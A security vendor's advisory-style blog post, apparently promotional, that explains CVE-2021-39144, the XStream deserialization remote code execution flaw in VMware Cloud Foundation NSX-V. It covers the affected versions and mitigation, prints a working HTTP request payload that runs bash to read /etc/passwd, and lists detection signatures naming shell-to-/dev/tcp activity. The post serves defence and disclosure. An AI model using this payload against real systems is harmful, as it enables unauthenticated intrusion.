VMware Cloud Foundation CVE-2021-39144 Vulnerability Exploitation Explained

The Blue Report 2024

Get a comprehensive analysis of over 136 million cyber attacks and understand the state of threat exposure management.

DOWNLOAD

On October 25, 2022, VMware disclosed a critical remote code execution vulnerability affecting VMware Cloud Foundation NSX-V in their security advisory [1]. A deserialization flaw found in XStream open-source library allows an unauthenticated attacker to leverage this flaw to execute arbitrary commands in vulnerable endpoints. The vulnerability has a CVSS score of 9.8 Critical, and there are publicly available proofs of concepts for CVE-2021-39144.

Simulate Vulnerability Exploitation Attacks with 14-Day Free Trial of Picus Platform


Which VMware Cloud Foundation Versions Are Affected by the CVE-2021-39144 Vulnerability?

CVE-2021-39144 vulnerability affects the open-source library XStream versions 1.4.17 and prior. Since VMware uses the XStream library in their Cloud Foundation (NSX-V) product, the vulnerability affects VMware Cloud Foundation (NSX-V) versions 3.x. 

Even though VMware ended the general support for NSX-V in January 2022, they published a patch that fixed the vulnerability due to its critical severity. The current and supported VMware Cloud Foundation versions 4.x are unaffected.

What is the Impact of CVE-2021-39144 Vulnerability?

VMware is a market leader in cloud systems management, and VMware Cloud Foundation is used by many organizations in government, finance, manufacturing, energy, insurance, healthcare, IT, and telecommunication organizations.

While VMware Cloud Foundation (NSX-V) product was deprecated at the time of discovery, vulnerable versions might still be used by many organizations. Due to its widespread use and critical severity, CVE-2021-39144 attacks pose a great risk to organizations.

The CVSS score of the vulnerability is 9.8 Critical.

How to Mitigate CVE-2021-39144 Vulnerability?

VMware released a patch for CVE-2021-39144 vulnerability, and security teams are advised to upgrade their vulnerable VMware Cloud Foundation (NSX-V) to version 3.11 and apply the workarounds given in VMware’s advisory.

CVE-2021-39144 Vulnerability Exploitation Explained

XStream is an open-source Java-based library that is used to serialize objects to XML and vice versa. In versions 1.4.18 and prior, the XStream library has a deserialization vulnerability that received the CVE number CVE-2021-39144. This vulnerability allows an attacker to manipulate the input stream for remote code execution in products that use the XStream library.

VMware Cloud Foundation NSX-V uses the package XStream version 1.4.18, and its endpoints are vulnerable to pre-authenticated remote code execution. 

In an example attack scenario, adversaries with access to endpoints can send the following post request to abuse the CVE-2021-39144 vulnerability. The deserialization flaw causes the malicious command to be executed with elevated privileges. 

PUT /page452579/api/2.0/services/usermgmt/password/1337 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: */*
Content-Type: application/xml
Content-Length: 557


<sorted-set>
    <string>foo</string>
    <dynamic-proxy>
        <interface>java.lang.Comparable</interface>
        <handler class="java.beans.EventHandler">
            <target class="java.lang.ProcessBuilder">
                <command>
                    <string>bash</string>
                    <string>-c</string>
                    <string> cat /etc/passwd </string>
                </command>
            </target>
            <action>start</action>
        </handler>
    </dynamic-proxy>
</sorted-set>

Example 1: CVE-2021-39144 Remote Code Execution Vulnerability Exploitation

How Picus Helps Simulate VMware Cloud Foundation CVE-2021-39144 Pre-authenticated Remote Code Execution Exploits?

We also strongly suggest simulating VMware Cloud Foundation CVE-2021-39144 pre-authenticated remote code execution vulnerability exploitation attacks to assess the effectiveness of your security controls using the Picus Complete Security Control Validation Platform. You can test your defenses against the CVE-2021-39144 vulnerability exploitation attacks and assess your security posture against the exploitation of hundreds of commonly exploited vulnerabilities within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threat for CVE-2021-39144 vulnerability: 

Threat ID

Threat Name

52353

VMware Web Attack Campaign

Moreover, Picus Threat Library contains 150+ threats containing 1500+ web application and vulnerability exploitation attacks in addition to 3500+ endpoint, malware, email, and data exfiltration threats as of today.

Picus also provides actionable mitigation content. Picus Mitigation Library includes prevention signatures to address the VMware Cloud Foundation CVE-2021-39144 RCE and other vulnerability exploitation attacks in preventive security controls. Currently, Picus Labs validated the following signatures:

Security Control

Signature ID

Signature Name

Snort

1.2019285.2

ET WEB_SERVER Possible bash shell piped to dev tcp Inbound to WebServer

Forcepoint NGFW

 

HTTP_CS_Xstream-Library-Insecure-Xml-Deserialization-CVE-2021-39144

Modsecurity

932100

Remote Command Execution: Unix Command Injection

Modsecurity

932150

Remote Command Execution: Direct Unix Command Execution

Modsecurity

932160

Remote Command Execution: Unix Shell Code Found

Modsecurity

944100

Remote Command Execution: Suspicious Java class detected

Modsecurity

944250

Remote Command Execution: Suspicious Java method detected

Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trialof Picus Complete Security Control Validation Platform.

References

[1] https://www.vmware.com/security/advisories/VMSA-2022-0027.html